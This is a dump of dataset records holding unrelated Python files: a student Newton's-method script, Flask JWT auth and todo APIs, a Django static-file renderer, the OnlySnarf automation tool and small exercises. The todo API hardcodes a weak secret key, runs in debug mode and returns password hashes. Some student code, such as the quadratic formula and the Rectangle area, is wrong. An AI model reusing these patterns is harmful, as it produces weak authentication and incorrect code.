x-((x**3)+(a*(x**2))+(b*x+c))/((3*(x**2))+(2*a*x)+b)\n # print the approximate solution\n print (\"The approximate solution of x^3+5x-3 is:\",x)\n return x\ndef newtonExact(a,b,c):\n x = 0\n x = -b+(math.sqrt(abs((b)**2-4*a*c)/2*a))\n print (x)\n return x\n\n\n# loop followings\nwhile True:\n # ask user for input for x^2 coefficient\n a = input(\"Enter the integer coefficient of x^2:\")\n # try convert to int, if ValueError, then print coefficents must be integers and go back to the input\n try:\n a = int(a)\n except ValueError:\n print(\"Coefficients must be integers\")\n continue\n # if the int is any interger then break out the loop\n if a < 0 or a == 0 or a >0:\n break\n\n# loop followings\nwhile True:\n # ask user for input for x^2 coefficient\n b = input(\"Enter the integer coefficient of x:\")\n # try convert to int, if ValueError, then print coefficents must be integers and go back to the input\n try:\n b = int(b)\n except ValueError:\n print(\"Coefficients must be integers\")\n continue\n # if the int is any interger then break out the loop\n if b < 0 or b == 0 or b >0:\n break\n \n# loop followings\nwhile True:\n # ask user for input for x^2 coefficient\n c = input(\"Enter the integer constant term:\")\n # try convert to int, if ValueError, then print coefficents must be integers and go back to the input\n try:\n c = int(c)\n except ValueError:\n print(\"Coefficients must be integers\")\n continue\n # if the int is any interger then break out the loop\n if c < 0 or c == 0 or c > 0:\n break\n \nnewton(a,b,c) #calls function with (a,b,c)\nnewtonExact(a,b,c)\n","sub_path":"ECS 36A/newton.py","file_name":"newton.py","file_ext":"py","file_size_in_byte":2005,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"511173350","text":"# Part B Task 2\nimport re\nimport os\nimport sys\n\ndef reverse_case(match_obj):\n char_elem = match_obj.group(0)\n if char_elem.islower():\n return char_elem.upper()\n else:\n return char_elem.lower() \n\n \n \ndef preprocessing(file_name):\n f = open(file_name)\n file_string = f.read()\n\n#pattern\n pattern = '[^a-zA-Z \\\\n]+'\n\n x1 = re.sub(pattern, \"\", file_string)\n\n 
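# collapse any runs of whitespace or newlines into a single space\n    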
x2 = re.sub(\"[\\s+\\\\n+]+\",' ',x1)\n\n x3 = re.sub('[A-Z]+', reverse_case,x2)\n return x3\n\nfilename = sys.argv[-1]\na = slice(7)\nname = slice(7,14)\n\nprint(preprocessing(filename[a]+'/' + filename[name]))\n\n\n\n","sub_path":"partb2.py","file_name":"partb2.py","file_ext":"py","file_size_in_byte":602,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"640100190","text":"# -*- coding: utf-8 -*-\nimport pytest\n\nfrom os.path import join\n\nfrom pyleecan.Classes.ForceMT import ForceMT\nfrom pyleecan.Classes.OPdq import OPdq\nfrom pyleecan.Classes.Simu1 import Simu1\nfrom pyleecan.Classes.MagFEMM import MagFEMM\nfrom pyleecan.Classes.InputCurrent import InputCurrent\n\nfrom pyleecan.Functions.load import load\nfrom pyleecan.Functions.Plot import dict_2D\nfrom pyleecan.definitions import DATA_DIR\nfrom Tests import save_validation_path as save_path\n\n\n@pytest.mark.long_5s\n@pytest.mark.long_1m\n@pytest.mark.MagFEMM\n@pytest.mark.ForceMT\n@pytest.mark.SIPMSM\n@pytest.mark.periodicity\n@pytest.mark.SingleOP\ndef test_compare_Kmesh():\n \"\"\"Validation of the AGSF transfer algorithm for SPMSM benchmark machine: sensitivity to the maximum considered wavenumbers\"\"\"\n\n # Load machine\n Benchmark = load(join(DATA_DIR, \"Machine\", \"Benchmark.json\"))\n\n # Prepare simulation\n simu = Simu1(name=\"test_compare_Kmesh_direct\", machine=Benchmark)\n\n simu.input = InputCurrent(\n OP=OPdq(N0=1200, Id_ref=0, Iq_ref=0),\n Ir=None,\n Na_tot=5 * 2 ** 8,\n Nt_tot=2,\n )\n\n # Configure simulation\n simu.elec = None\n\n simu.force = ForceMT()\n\n simu.mag = MagFEMM(\n is_periodicity_a=False,\n is_periodicity_t=False,\n is_sliding_band=False,\n Kmesh_fineness=1,\n )\n\n Rsbo = 0.0480\n Rrbo = 0.0450\n Rs = (Rsbo - Rrbo) * 99 / 100 + Rrbo\n\n simu2 = simu.copy()\n simu2.name = \"test_compare_Kmesh_transfer\"\n simu2.force.is_agsf_transfer = True\n simu2.force.Rsbo_enforced_transfer = Rs\n simu2.force.max_wavenumber_transfer = 100\n\n # Enforced Rag for ref\n simu.mag.Rag_enforced = Rs\n\n # Simu with low finesness\n simu3 = simu.copy()\n simu3.name = \"test_compare_Kmesh_direct_fine\"\n simu3.mag.Kmesh_fineness = 2 # 4\n out = simu.run()\n out2 = simu2.run()\n out3 = simu3.run()\n\n AGSF_list = list()\n AGSF_list.append(out2.force.AGSF)\n AGSF_list.append(out3.force.AGSF)\n legend_list = [\"Direct\", \"Transfer\", \"Direct Fine Mesh\"]\n\n # out.force.AGSF.plot_2D_Data(\n # \"angle=[0,3.14]\",\n # \"time=0\",\n # data_list=AGSF_list,\n # legend_list=legend_list,\n # save_path=join(save_path, \"test_compare_Kmesh.png\"),\n # is_show_fig=False,\n # **dict_2D\n # )\n\n out.force.AGSF.plot_2D_Data(\n \"wavenumber\",\n \"freqs=0\",\n x_min=-1,\n x_max=37,\n data_list=AGSF_list,\n legend_list=legend_list,\n save_path=join(save_path, \"test_compare_Kmesh_fft.png\"),\n is_show_fig=False,\n barwidth=800,\n **dict_2D\n )\n\n return out, out2, out3\n\n\nif __name__ == \"__main__\":\n\n out, out2, out3 = test_compare_Kmesh()\n","sub_path":"Tests/Validation/Force/AGSF_Transfer/test_compare_Kmesh.py","file_name":"test_compare_Kmesh.py","file_ext":"py","file_size_in_byte":2729,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"30547978","text":"from flask import Flask, request, jsonify, abort\n\nimport json\nfrom functools import wraps\nfrom jose import jwt\nfrom urllib.request import urlopen\n\napp = Flask(__name__)\n\nAUTH0_DOMAIN = 'dev-dz4.us.auth0.com'\nALGORITHMS = ['RS256']\nAPI_AUDIENCE = 
'image'\n\n\nclass AuthError(Exception):\n def __init__(self, error, status_code):\n self.error = error\n self.status_code = status_code\n\n\ndef get_token_auth_header():\n \"\"\"Obtains the Access Token from the Authorization Header\n \"\"\"\n auth = request.headers.get('Authorization', None)\n if not auth:\n raise AuthError({\n 'code': 'authorization_header_missing',\n 'description': 'Authorization header is expected.'\n }, 401)\n\n parts = auth.split()\n if parts[0].lower() != 'bearer':\n raise AuthError({\n 'code': 'invalid_header',\n 'description': 'Authorization header must start with \"Bearer\".'\n }, 401)\n\n elif len(parts) == 1:\n raise AuthError({\n 'code': 'invalid_header',\n 'description': 'Token not found.'\n }, 401)\n\n elif len(parts) > 2:\n raise AuthError({\n 'code': 'invalid_header',\n 'description': 'Authorization header must be bearer token.'\n }, 401)\n\n token = parts[1]\n return token\n\n\ndef verify_decode_jwt(token):\n jsonurl = urlopen(f'https://{AUTH0_DOMAIN}/.well-known/jwks.json')\n jwks = json.loads(jsonurl.read())\n unverified_header = jwt.get_unverified_header(token)\n rsa_key = {}\n if 'kid' not in unverified_header:\n raise AuthError({\n 'code': 'invalid_header',\n 'description': 'Authorization malformed.'\n }, 401)\n\n for key in jwks['keys']:\n if key['kid'] == unverified_header['kid']:\n rsa_key = {\n 'kty': key['kty'],\n 'kid': key['kid'],\n 'use': key['use'],\n 'n': key['n'],\n 'e': key['e']\n }\n if rsa_key:\n try:\n payload = jwt.decode(\n token,\n rsa_key,\n algorithms=ALGORITHMS,\n audience=API_AUDIENCE,\n issuer='https://' + AUTH0_DOMAIN + '/'\n )\n\n return payload\n\n except jwt.ExpiredSignatureError:\n raise AuthError({\n 'code': 'token_expired',\n 'description': 'Token expired.'\n }, 401)\n\n except jwt.JWTClaimsError:\n raise AuthError({\n 'code': 'invalid_claims',\n 'description': 'Incorrect claims. Please, check the audience and issuer.'\n }, 401)\n except Exception:\n raise AuthError({\n 'code': 'invalid_header',\n 'description': 'Unable to parse authentication token.'\n }, 400)\n raise AuthError({\n 'code': 'invalid_header',\n 'description': 'Unable to find the appropriate key.'\n }, 400)\n\ndef check_permissions(permission, payload):\n if 'permissions' not in payload:\n raise AuthError({\n 'code': 'invalid_claims',\n 'description': 'Permission not included in JWT.' \n }, 400)\n if permission not in payload['permissions']:\n raise AuthError({\n 'code': 'unauthorized',\n 'description': 'Permission not found.' 
\n }, 403)\n return True\n\ndef requires_auth(permission=''):\n def requires_auth_ex(f):\n @wraps(f)\n def wrapper(*args, **kwargs):\n token = get_token_auth_header()\n try:\n payload = verify_decode_jwt(token)\n except:\n abort(401)\n\n check_permissions(permission, payload)\n return f(payload, *args, **kwargs)\n\n return wrapper\n return requires_auth_ex\n\ngreetings = {\n 'en': 'hello', \n 'es': 'Hola', \n 'ar': 'مرحبا',\n 'ru': 'Привет',\n 'fi': 'Hei',\n 'he': 'שלום',\n 'ja': 'こんにちは'\n }\n\n@app.route('/greeting', methods=['GET'])\n@requires_auth('view:image')\ndef greeting_all(payload):\n print(payload)\n return jsonify({'greetings': greetings})\n\n@app.route('/greeting/', methods=['GET'])\ndef greeting_one(lang):\n print(lang)\n if(lang not in greetings):\n abort(404)\n return jsonify({'greeting': greetings[lang\n ]})\n\n@app.route('/greeting', methods=['POST'])\ndef greeting_add():\n info = request.get_json()\n if('lang' not in info or 'greeting' not in info):\n abort(422)\n greetings[info['lang']] = info['greeting']\n return jsonify({'greetings':greetings})\n\nif __name__ == '__main__':\n app.run()","sub_path":"FlaskRecap/FlaskRecap.py","file_name":"FlaskRecap.py","file_ext":"py","file_size_in_byte":4763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"418196184","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n__author__ = 'victor'\n\nimport json\nfrom api import app\nfrom flask import request, g, jsonify, make_response\n\nimport os\nimport sys\nreload(sys)\nsys.setdefaultencoding('utf-8')\nsys.path.append(os.path.join(os.path.split(os.path.realpath(__file__))[0], '../../../nlp'))\nsys.path.append(os.path.join(os.path.split(os.path.realpath(__file__))[0], '../../../util'))\n\nimport db as dbcon\nfrom common import dbutil\nfrom score.end import RankScorer\n\nimport time\nimport multiprocessing\n\n@app.route(\"/api/search/collection\", methods=['GET', 'POST', 'OPTIONS'])\ndef collection():\n\n query = json.loads(request.data)\n colid = query.get('id')\n results = make_query(query)\n\n p = multiprocessing.Process(target=update_collection, args=(colid, results, True, query.get('update', False)))\n p.start()\n time.sleep(2)\n return make_response(jsonify({'success': True}))\n # return update_collection(colid, results, update=query.get('update', False))\n\n\ndef make_query(query):\n\n query['size'] = max(query.get('size', 0), 10000)\n # query['size'] = 1536\n rounds = query.get('round', [])\n if 1000 in rounds and (0 not in rounds):\n query.setdefault('round', []).append(0)\n return g.sc.search('company', **query)\n\n\ndef update_collection(colid, results, in_flask=True, update=False):\n\n # update collecion\n update_counts = 0\n updates = []\n db = dbcon.connect_torndb()\n if results.get('company'):\n # dbutil.clear_collection(db, colid)\n cids = [db.get('select id from company where code=%s', code).id for code in results.get('company').get('data')]\n\n # remove old companies that are no longer in this collection\n if update:\n olds = dbutil.get_collection_companies(db, colid)\n remove = [old for old in olds if old not in cids]\n dbutil.clear_collection(db, colid, True, remove)\n # time.sleep(0.0002)\n cids.reverse()\n for cid in cids:\n update_status = dbutil.update_collection(db, colid, cid)\n update_counts += update_status\n if update_status > 0:\n updates.append(cid)\n if in_flask:\n dbutil.set_collection_process_status(db, colid)\n db.close()\n return make_response(jsonify({'success': True}))\n else:\n 
time.sleep(1)\n # for cid in updates:\n # dbutil.update_collection(db, colid, cid)\n dbutil.set_collection_process_status(db, colid)\n db.close()\n if in_flask:\n dbutil.clear_collection(db, colid)\n db.close()\n return make_response(jsonify({'success': False}))\n return updates\n","sub_path":"data/search/api/views/collection.py","file_name":"collection.py","file_ext":"py","file_size_in_byte":2699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"523975749","text":"\"\"\"\nQuestion 53:\nDefine a class named Rectangle which can be constructed by a length and width. The Rectangle\nclass has a method which can compute the area.\n\"\"\"\ninput_length = input(\"Write length here: \")\ninput_width = input(\"Write width here: \")\n\nclass Rectangle:\n\t\"\"\"\n\tClass to find area of rectangle.\n\t\"\"\"\n\t@staticmethod\n\tdef area(l,b):\n\t\t\"\"\"\n\t\tparam:l,b\n\t\treturn:area of rectangle.\n\t\t\"\"\"\n\t\treturn l*b\n\n# Callin static method of Circle class.\narea = Rectangle.area(input_length,input_width)\nprint(area)\n","sub_path":"p53.py","file_name":"p53.py","file_ext":"py","file_size_in_byte":506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"377433422","text":"#!/usr/bin/python3\n# main OnlySnarf class\n\nimport random\nimport os\nimport shutil\nimport datetime\nimport json\nimport sys\nimport pathlib\nimport time\n##\nfrom . import cron as Cron\nfrom .classes import Discount, Promotion\nfrom .driver import Driver\nfrom .settings import Settings\nfrom .user import User\nfrom .profile import Profile\n\n#####################\n##### OnlySnarf #####\n#####################\n\nclass Snarf:\n\n def __init__(self):\n pass\n # self.profile = Profile({})\n\n ####################\n ##### Discount #####\n ####################\n\n @staticmethod\n def discount(discount=None):\n if not discount: discount = Settings.get_discount()\n try: discount.apply()\n except Exception as e: Settings.dev_print(e)\n Snarf.exit()\n\n ################\n ##### Exit #####\n ################\n\n @staticmethod\n def exit():\n if Settings.is_show_window():\n Settings.maybe_print(\"Skipping: Window Close\")\n return\n Driver.exit()\n\n ###################\n ##### Message #####\n ###################\n\n @staticmethod\n def message(message=None):\n if not message: message = Settings.get_message()\n try: message.send()\n except Exception as e: Settings.dev_print(e)\n Snarf.exit()\n \n ################\n ##### Post #####\n ################\n\n @staticmethod\n def post(message=None):\n if not message: message = Settings.get_message()\n try: message.post()\n except Exception as e: Settings.dev_print(e)\n Snarf.exit()\n\n ###################\n ##### Profile #####\n ###################\n\n @staticmethod\n def profile(profile=None):\n if not profile: profile = Settings.get_profile()\n try: profile.update()\n except Exception as e: Settings.dev_print(e)\n Snarf.exit()\n \n #####################\n ##### Promotion #####\n #####################\n\n # def give_trial(user):\n # print(\"Applying Promotion: \"+user)\n # link = Driver.get_new_trial_link()\n # text = \"Here's your free trial link!\\n\"+link\n # Settings.dev_print(\"Link: \"+str(text))\n # # Settings.send_email(email, text)\n\n @staticmethod\n def promotion(promotion=None):\n if not promotion: promotion = Settings.get_promotion()\n try: promotion.apply_to_user()\n except Exception as e: Settings.dev_print(e)\n Snarf.exit()\n\n #################\n ##### Reset 
#####\n #################\n\n @staticmethod\n def reset():\n Driver.reset()\n\n #################\n ##### Users #####\n #################\n\n @staticmethod\n def get_following():\n users = []\n try: users = User.get_following()\n except Exception as e: Settings.dev_print(e)\n return users\n\n @staticmethod\n def get_users():\n users = []\n try: users = User.get_all_users()\n except Exception as e: Settings.dev_print(e)\n return users\n\n ###############\n ##### Dev #####\n ###############\n\n @staticmethod\n def test():\n print('0/3 : Deleting Locals')\n print('1/3 : Testing')\n print('TESTING: Users')\n response = Driver.users_get()\n # return True\n print('TESTING: Following')\n response = Driver.following_get()\n # return True\n print('TESTING: Settings - Get')\n response = Driver.settings_get_all()\n return True\n print('TESTING: Cron')\n response = Cron.test()\n if not response or response == None:\n print(\"Error: Failed to test crons\")\n reset_ = reset()\n if not reset_:\n return print(\"Error: Failed to Reset\")\n return True\n\n################################################################################################################################################\n\ndef main():\n # try:\n from .file import File\n File.remove_local()\n Settings.set_prompt(False)\n Settings.set_confirm(False)\n action = Settings.get_action()\n print(\"Running - {}\".format(action))\n ## Actions\n success = False\n if str(action) == \"test\":\n success = Snarf.test()\n elif str(action) == \"post\":\n success = Snarf.post()\n elif str(action) == \"message\":\n success = Snarf.message()\n elif str(action) == \"discount\":\n success = Snarf.discount()\n elif str(action) == \"promotion\":\n success = Snarf.promotion()\n elif str(action) == \"profile\":\n success = Snarf.profile()\n else:\n print(\"Warning: Missing Method\")\n Snarf.exit()\n # except Exception as e:\n # Settings.dev_print(e)\n # print(\"Shnarf!\")\n # finally:\n # sys.exit(0)\n\n################################################################################################################################################\n\nif __name__ == \"__main__\":\n main()","sub_path":"OnlySnarf/src/snarf.py","file_name":"snarf.py","file_ext":"py","file_size_in_byte":4914,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"271912422","text":"#!/usr/bin/python\n#\n# Author: Conan Albrecht \n# License: Apache Open Source License\n# Version: 2013.10.19\n#\n__doc__ = '''\n This file is used by base_app/templates/base_template.htm to automatically include the .css, .cssm, .js, and .jsm\n files into a template hierarchy.\n \n For example, suppose we have the following template chain:\n Base template: /base_app/templates/base_template.htm\n Child template: /calculator/templates/index.html\n\n Because of this chain, the following styles and scripts are automatically included in the rendered page:\n\n /base_app/styles/base.css\n /base_app/styles/base.cssm (this one can contain dynamic Python code)\n /calculator/styles/index.css\n /calculator/styles/index.cssm (this one can contain dynamic Python code)\n /base_app/scripts/base.js\n /base_app/scripts/base.jsm (this one can contain dynamic Python code)\n /calculator/scripts/index.js\n /calculator/scripts/index.jsm (yep, you guessed it, this one can contain dynamic Python code)\n \n This file makes the above happen. It allows the programmer to separate the HTML, CSS, and JS into separate\n files but still have them serve to the browser together. 
It also keeps the CSS and JS together with the HTML\n at each specific level in the template inheritance chain. \n \n Note that with this Django starter kit, we recreate the static renderer each time.\n At deployment, it would speed things up considerably to cache these StaticRenderer\n objects in a dict or other type of cache. This isn't done here to keep things simpler.\n'''\n\nfrom django.conf import settings\nfrom base_app.controller import MakoTemplateRenderer\nimport os, os.path, time\n\n\n######################################################################\n### Get the minute the server started. On some browsers, new CSS/JS\n### doesn't load because the browser waits for 7 (or whatever) days\n### to check for a new version. This value is set by your web server,\n### and it's normally a good thing to speed everything up. However,\n### when you upload new CSS/JS, you want all browsers to download the new\n### files even if their cached version hasn't expired yet.\n###\n### By adding an int to the end of the .css and .js files, browsers will\n### see the files as *new* every time you restart your web server.\nSERVER_START_MINUTE = int(time.time() / 60) # minutes since Jan 1, 1970\n\n\n#######################################################################\n### A dict of template renderers for scripts and styles in our apps.\n\nSCRIPT_RENDERERS = {}\nSTYLE_RENDERERS = {}\nfor appname in settings.MAKO_ENABLED_APPS:\n SCRIPT_RENDERERS[appname] = MakoTemplateRenderer(appname, 'scripts')\n STYLE_RENDERERS[appname] = MakoTemplateRenderer(appname, 'styles')\n\n\n\n#######################################################################\n### Template-specific CSS and JS, both static and mako-rendered\n\nclass TemplateInfo(object):\n '''Data class that holds information about a template's directories. 
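# NOTE: several tag-building lines in the TemplateInfo constructor below
# read self.css = '' % (...) or ret.append('' % ...): the HTML literals
# appear to have been lost in extraction, leaving empty format strings.
# Based on the format arguments they take, the static branches plausibly
# resembled the following reconstruction (not the verified original):
#
#     self.css = '<link rel="stylesheet" type="text/css" href="%s?%s" />' % (
#         os.path.join(settings.STATIC_URL, self.app, 'styles',
#                      self.template_name + '.css'), SERVER_START_MINUTE)
#     self.js = '<script type="text/javascript" src="%s?%s"></script>' % (
#         os.path.join(settings.STATIC_URL, self.app, 'scripts',
#                      self.template_name + '.js'), SERVER_START_MINUTE)
#
# and the .cssm/.jsm branches presumably wrapped the Mako-rendered output in
# inline <style>...</style> / <script>...</script> tags. Appending
# SERVER_START_MINUTE as a query string is the cache-busting trick described
# above: the URL changes on every server restart, so browsers re-download
# the assets even when their cached copies have not yet expired.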
The StaticRenderer\n object below creates a TemplateInfo object for each level in the Mako template inheritance\n chain.\n '''\n def __init__(self, template):\n # set up the directories so we can go through them fast on render\n self.template_dir, self.template_name = os.path.split(os.path.splitext(template.filename)[0])\n self.app_dir = os.path.dirname(self.template_dir)\n self.app = os.path.split(self.app_dir)[1]\n # the static templatename.css file\n self.css = None\n if os.path.exists(os.path.join(self.app_dir, 'styles', self.template_name + '.css')):\n self.css = '' % (os.path.join(settings.STATIC_URL, self.app, 'styles', self.template_name + '.css'), SERVER_START_MINUTE)\n # the mako-rendered templatename.cssm file\n self.cssm = None\n if os.path.exists(os.path.join(self.app_dir, 'styles', self.template_name + '.cssm')):\n self.cssm = self.template_name + '.cssm'\n # the static templatename.js file\n self.js = None\n if os.path.exists(os.path.join(self.app_dir, 'scripts', self.template_name + '.js')):\n self.js = '' % (os.path.join(settings.STATIC_URL, self.app, 'scripts', self.template_name + '.js'), SERVER_START_MINUTE)\n # the mako-rendered templatename.jsm file\n self.jsm = None\n if os.path.exists(os.path.join(self.app_dir, 'scripts', self.template_name + '.jsm')):\n self.jsm = self.template_name + '.jsm'\n \n\nclass StaticRenderer(object):\n '''The styles and scripts for a given template.'''\n def __init__(self, mako_self):\n # get the inheritance chain for this template\n self.template_infos = []\n while mako_self != None:\n self.template_infos.insert(0, TemplateInfo(mako_self.template)) # go in reversed order so the most specialized template CSS/JS prints last and wins in a conflict\n mako_self = mako_self.inherits\n\n\n def get_template_css(self, request, context):\n '''Retrives the static and mako-rendered CSS'''\n ret = []\n for ti in self.template_infos:\n if ti.css:\n ret.append(ti.css) # the was already created once in the constructor\n if ti.cssm:\n ret.append('' % STYLE_RENDERERS[ti.app].render(request, ti.cssm, context.kwargs)) \n return '\\n'.join(ret)\n\n\n def get_template_js(self, request, context):\n '''Retrieves the static and mako_rendered CSS''' \n ret = []\n for ti in self.template_infos:\n if ti.js:\n ret.append(ti.js) # the ' % SCRIPT_RENDERERS[ti.app].render(request, ti.jsm, context.kwargs))\n return '\\n'.join(ret)\n\n\n","sub_path":"base_app/static_files.py","file_name":"static_files.py","file_ext":"py","file_size_in_byte":5759,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"302085160","text":"from flask import Flask, config, request, jsonify, make_response\nfrom flask_sqlalchemy import SQLAlchemy\nfrom sqlalchemy import Integer, String, Column, Boolean\nfrom flask_session import Session\nimport uuid,jwt,datetime\nfrom werkzeug.security import generate_password_hash, check_password_hash\nfrom functools import wraps\n\n\napp = Flask(__name__)\napp.config['SECRET_KEY'] = 'thisissecreet'\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///test.db'\n\ndb = SQLAlchemy(app)\n\n\nclass User(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n public_id = db.Column(db.String(50), unique=True)\n name = db.Column(db.String(80))\n password = db.Column(db.String(80))\n admin = db.Column(db.Boolean)\n\n\nclass Todo(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n text = db.Column(db.String(100))\n complate = db.Column(db.Boolean)\n user_id = db.Column(db.Integer)\n\n\ndef token_required(f):\n 
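# NOTE: the jwt.decode(token, SECRET_KEY) call below matches the PyJWT 1.x
# API. On PyJWT >= 2.0, decode() additionally requires an algorithms list,
# and encode() returns str rather than bytes, so the token.decode('UTF-8')
# in the login route would raise AttributeError. A hedged sketch for
# PyJWT 2.x:
#
#     data = jwt.decode(token, app.config['SECRET_KEY'], algorithms=['HS256'])
#     token = jwt.encode(
#         {'public_id': user.public_id,
#          'exp': datetime.datetime.utcnow() + datetime.timedelta(minutes=30)},
#         app.config['SECRET_KEY'], algorithm='HS256')
#     return jsonify({'token': token})   # already a str on PyJWT >= 2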
@wraps(f)\n def decorated(*args,**kwargs):\n token=None\n if 'x-access-token' in request.headers:\n token=request.headers['x-access-token']\n if not token:\n return jsonify({'message':'Token is missing !!'}),401\n \n try:\n print(token)\n data=jwt.decode(token, app.config['SECRET_KEY'])\n print(data)\n current_user=User.query.filter_by(public_id=data['public_id']).first()\n except:\n return jsonify({'message':'Token is invalid !!'}),401\n return f(current_user,*args,**kwargs)\n return decorated\n \n\n@app.route('/user', methods=['GET'])\n@token_required\ndef get_all_user(current_user):\n if not current_user.admin:\n return jsonify({'message':'Can not perform this function'})\n users = User.query.all()\n output = []\n for user in users:\n user_data = {}\n user_data['public_id'] = user.public_id\n user_data['name'] = user.name\n user_data['password'] = user.password\n user_data['admin'] = user.admin\n output.append(user_data)\n return jsonify({'users': output})\n\n\n@app.route('/user/', methods=['GET'])\n@token_required\ndef get_one_user(current_user,public_id):\n if not current_user.admin:\n return jsonify({'message':'Can not perform this function'})\n user = User.query.filter_by(public_id=public_id).first()\n if not user:\n return jsonify({'message': 'No user found !!!'})\n user_data = {}\n user_data['public_id'] = user.public_id\n user_data['name'] = user.name\n user_data['password'] = user.password\n user_data['admin'] = user.admin\n return jsonify({'user': user_data})\n\n\n@app.route('/user', methods=['POST'])\n@token_required\ndef create_user(current_user):\n if not current_user.admin:\n return jsonify({'message':'Can not perform this function'})\n data = request.get_json()\n hash_password = generate_password_hash(data['password'], method='sha256')\n new_user = User(public_id=str(uuid.uuid4()),\n name=data['name'], password=hash_password, admin=False)\n db.session.add(new_user)\n db.session.commit()\n return jsonify({'message': 'New user Created !!!'})\n\n\n@app.route('/user/', methods=['PUT'])\n@token_required\ndef promote_user(current_user,public_id):\n if not current_user.admin:\n return jsonify({'message':'Can not perform this function'})\n user = User.query.filter_by(public_id=public_id).first()\n if not user:\n return jsonify({'message': 'No user found !!!'})\n user.admin = True\n db.session.commit()\n return jsonify({'message': 'The user has promoted !!!'})\n\n\n@app.route('/user/', methods=['DELETE'])\n@token_required\ndef delete_user(current_user,public_id):\n if not current_user.admin:\n return jsonify({'message':'Can not perform this function'})\n user = User.query.filter_by(public_id=public_id).first()\n if not user:\n return jsonify({'message': 'No user found !!!'})\n db.session.delete(user)\n db.session.commit()\n return jsonify({'message': 'The user has been deleted !!!'})\n\n\n@app.route('/login')\ndef login():\n auth = request.authorization\n if not auth or not auth.username or not auth.password:\n return make_response('Could not verify', 401, {'www-Authenticate': 'Basic realm=\"Login Required !!\"'})\n user = User.query.filter_by(name=auth.username).first()\n if not user:\n return make_response('Could not user is verify', 401, {'www-Authenticate': 'Basic realm=\"Login Required !!\"'})\n \n if check_password_hash(user.password, auth.password):\n token = jwt.encode({'public_id': user.public_id, \n 'exp': datetime.datetime.utcnow()+datetime.timedelta(minutes=30)}, \n app.config['SECRET_KEY'])\n # return jsonify({'token':token.decode('UTF-8')})\n return 
jsonify({'token':token.decode('UTF-8')})\n return make_response('Could not verify', 401, {'www-Authenticate': 'Basic realm=\"Login Required !!\"'})\n \n\n@app.route('/todo', methods=['GET'])\n@token_required\ndef get_all_todos(current_user):\n todos = Todo.query.all()\n output = []\n for todo in todos:\n todo_data = {}\n todo_data['id'] = todo.id\n todo_data['text'] = todo.text\n todo_data['complate'] = todo.complate\n output.append(todo_data)\n return jsonify({'todos': output})\n\n\n@app.route('/todo/', methods=['GET'])\n@token_required\ndef get_one_todo(current_user,todo_id):\n todo = Todo.query.filter_by(id=todo_id,user_id=current_user.id).first()\n if not todo:\n return jsonify({'message': 'No todo found !!!'})\n todo_data = {}\n todo_data['id'] = todo.id\n todo_data['text'] = todo.text\n todo_data['complate'] = todo.complate\n return jsonify({'user': todo_data})\n\n\n@app.route('/todo', methods=['POST'])\n@token_required\ndef create_todo(current_user):\n data = request.get_json()\n new_todo = Todo(text=data['text'],complate=False,user_id=current_user.id)\n db.session.add(new_todo)\n db.session.commit()\n return jsonify({'message': 'Todo Created !!!'})\n\n\n@app.route('/todo/', methods=['PUT'])\n@token_required\ndef promote_todo(current_user,todo_id):\n todo = Todo.query.filter_by(id=todo_id,user_id=current_user.id).first()\n if not todo:\n return jsonify({'message': 'Todo item is not found !!!'})\n todo.complate = True\n db.session.commit()\n return jsonify({'message': 'Todo item has been complated !!!'})\n\n\n@app.route('/todo/', methods=['DELETE'])\n@token_required\ndef delete_todo(current_user,todo_id):\n todo = Todo.query.filter_by(id=todo_id,user_id=current_user.id).first()\n if not todo:\n return jsonify({'message': 'Todo not found !!!'})\n db.session.delete(todo)\n db.session.commit()\n return jsonify({'message': 'Todo has been deleted !!!'})\n\n\n\nif __name__ == \"__main__\":\n db.create_all()\n app.run(debug=True)\n","sub_path":"api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":6910,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"145632817","text":"# -*- coding: utf-8 -*-\r\n\"\"\" \r\n@date: Sat Jan 22 10:36:03 2022\r\n@author: rstreppa ( roberto.strepparava@gmail.com )\r\n@company: https://github.com/rstreppa\r\n@type: lib\r\n@description: simple bit manipulation problems\r\n\"\"\"\r\n\r\nimport operator\r\nimport math\r\n\r\ndef singleNumber(nums):\r\n ''' https://hackernoon.com/xor-the-magical-bit-wise-operator-24d3012ed821\r\n Solution using XOR\r\n \r\n Bitwise XOR ( ^ ) like the other operators (except ~) \r\n also take two equal-length bit patterns. \r\n If both bits in the compared position of the bit patterns are 0 or 1, \r\n the bit in the resulting bit pattern is 0, otherwise 1.\r\n '''\r\n res = 0\r\n for num in nums:\r\n res ^= num\r\n return res\r\n\r\ndef isPowerof2(x):\r\n ''' Logic: All the power of 2 have only single bit set e.g. 
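# NOTE: a quick check of the XOR identity behind singleNumber() above.
# Pairs cancel because a ^ a == 0 and a ^ 0 == a, so only the unpaired
# value survives:
#
#     assert singleNumber([4, 1, 2, 1, 2]) == 4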
